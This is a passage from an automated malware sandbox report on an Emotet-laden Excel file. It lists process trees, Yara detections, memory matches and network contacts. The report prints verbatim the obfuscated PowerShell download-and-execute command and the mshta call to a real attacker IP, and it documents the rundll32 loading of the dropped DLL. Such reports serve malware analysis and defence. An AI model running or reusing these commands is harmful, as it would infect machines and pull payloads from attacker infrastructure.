Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: imedpub_6.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.620000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2630000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2420000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d30000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c80000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ac0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bd0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3020000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ef0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f70000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ec0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562403 Sample: imedpub_6.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 42 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\imedpub_6.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States 23->57 59 jurnalpjf.lan.go.id 103.206.244.105, 49170, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\...\xjvfkwqtmalp.bjg (copy), PE32 32->43 dropped 61 Hides that 